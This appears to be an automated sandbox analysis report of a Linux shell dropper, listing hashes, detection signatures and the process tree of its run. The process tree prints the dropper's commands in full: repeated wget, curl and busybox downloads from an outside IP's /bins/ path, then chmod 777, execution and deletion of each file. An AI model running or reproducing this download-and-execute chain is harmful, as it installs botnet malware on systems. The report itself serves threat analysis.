Analysis
-
max time kernel
15s -
max time network
16s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
21/10/2024, 01:33
Static task
static1
Behavioral task
behavioral1
Sample
a2a4735c2f5a52947559a5ea976abf9f6961cc8f822bb110b43a56727b13d00f.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
a2a4735c2f5a52947559a5ea976abf9f6961cc8f822bb110b43a56727b13d00f.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
a2a4735c2f5a52947559a5ea976abf9f6961cc8f822bb110b43a56727b13d00f.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
a2a4735c2f5a52947559a5ea976abf9f6961cc8f822bb110b43a56727b13d00f.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
a2a4735c2f5a52947559a5ea976abf9f6961cc8f822bb110b43a56727b13d00f.sh
-
Size
10KB
-
MD5
674a32798f98c315613e7faf2e40ec5e
-
SHA1
67d83676dabc7dd94135fd2efe21e143629a0595
-
SHA256
a2a4735c2f5a52947559a5ea976abf9f6961cc8f822bb110b43a56727b13d00f
-
SHA512
c2ce59e5319977359055720990b73cfc87fedd418a9f798866ffd52d40965345de2adada38339b63bfaffe3699e406f5b3325497b21358e40c983420935e9ba5
-
SSDEEP
192:V/jtetutx2SQUm9F1F0NVyGr6yrIx9FUtetutx2SFjtNhyGr6y1:V/Z+ux2SQUm9F1F0NlM9FE+ux2SFRN7
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 771 chmod 777 chmod 783 chmod 789 chmod 795 chmod 723 chmod 739 chmod 754 chmod -
Executes dropped EXE 8 IoCs
ioc pid Process /tmp/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4 724 TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4 /tmp/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA 741 zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA /tmp/eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv 756 eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv /tmp/NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk 772 NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk /tmp/UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr 778 UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr /tmp/efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY 784 efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY /tmp/jbkBazKADCANOq2el15iaIH9fETZUnZ8iX 790 jbkBazKADCANOq2el15iaIH9fETZUnZ8iX /tmp/LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s 796 LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s -
Checks CPU configuration 1 TTPs 8 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 8 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA curl File opened for modification /tmp/eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv curl File opened for modification /tmp/NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk curl File opened for modification /tmp/UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr curl File opened for modification /tmp/efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY curl File opened for modification /tmp/jbkBazKADCANOq2el15iaIH9fETZUnZ8iX curl File opened for modification /tmp/LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s curl File opened for modification /tmp/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4 curl
Processes
-
/tmp/a2a4735c2f5a52947559a5ea976abf9f6961cc8f822bb110b43a56727b13d00f.sh/tmp/a2a4735c2f5a52947559a5ea976abf9f6961cc8f822bb110b43a56727b13d00f.sh1⤵PID:645
-
/bin/rm/bin/rm bins.sh2⤵PID:652
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI42⤵PID:653
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:675
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI42⤵PID:706
-
-
/bin/chmodchmod 777 TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI42⤵
- File and Directory Permissions Modification
PID:723
-
-
/tmp/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4./TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI42⤵
- Executes dropped EXE
PID:724
-
-
/bin/rmrm TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI42⤵PID:725
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA2⤵PID:726
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:733
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA2⤵PID:738
-
-
/bin/chmodchmod 777 zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA2⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA./zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA2⤵
- Executes dropped EXE
PID:741
-
-
/bin/rmrm zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA2⤵PID:742
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv2⤵PID:744
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:748
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv2⤵PID:752
-
-
/bin/chmodchmod 777 eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv2⤵
- File and Directory Permissions Modification
PID:754
-
-
/tmp/eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv./eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv2⤵
- Executes dropped EXE
PID:756
-
-
/bin/rmrm eM8hW11E8wiS7IT8XWE2vqodSRRbS23rAv2⤵PID:757
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk2⤵PID:758
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:761
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk2⤵PID:767
-
-
/bin/chmodchmod 777 NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk2⤵
- File and Directory Permissions Modification
PID:771
-
-
/tmp/NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk./NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk2⤵
- Executes dropped EXE
PID:772
-
-
/bin/rmrm NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk2⤵PID:773
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr2⤵PID:774
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:775
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr2⤵PID:776
-
-
/bin/chmodchmod 777 UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr2⤵
- File and Directory Permissions Modification
PID:777
-
-
/tmp/UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr./UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr2⤵
- Executes dropped EXE
PID:778
-
-
/bin/rmrm UahO4wacQMgzrCLlnEX97YFF8WBuEznUnr2⤵PID:779
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY2⤵PID:780
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:781
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY2⤵PID:782
-
-
/bin/chmodchmod 777 efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY2⤵
- File and Directory Permissions Modification
PID:783
-
-
/tmp/efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY./efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY2⤵
- Executes dropped EXE
PID:784
-
-
/bin/rmrm efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY2⤵PID:785
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jbkBazKADCANOq2el15iaIH9fETZUnZ8iX2⤵PID:786
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jbkBazKADCANOq2el15iaIH9fETZUnZ8iX2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:787
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jbkBazKADCANOq2el15iaIH9fETZUnZ8iX2⤵PID:788
-
-
/bin/chmodchmod 777 jbkBazKADCANOq2el15iaIH9fETZUnZ8iX2⤵
- File and Directory Permissions Modification
PID:789
-
-
/tmp/jbkBazKADCANOq2el15iaIH9fETZUnZ8iX./jbkBazKADCANOq2el15iaIH9fETZUnZ8iX2⤵
- Executes dropped EXE
PID:790
-
-
/bin/rmrm jbkBazKADCANOq2el15iaIH9fETZUnZ8iX2⤵PID:791
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s2⤵PID:792
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:793
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s2⤵PID:794
-
-
/bin/chmodchmod 777 LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s2⤵
- File and Directory Permissions Modification
PID:795
-
-
/tmp/LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s./LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s2⤵
- Executes dropped EXE
PID:796
-
-
/bin/rmrm LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s2⤵PID:797
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY2⤵PID:798
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97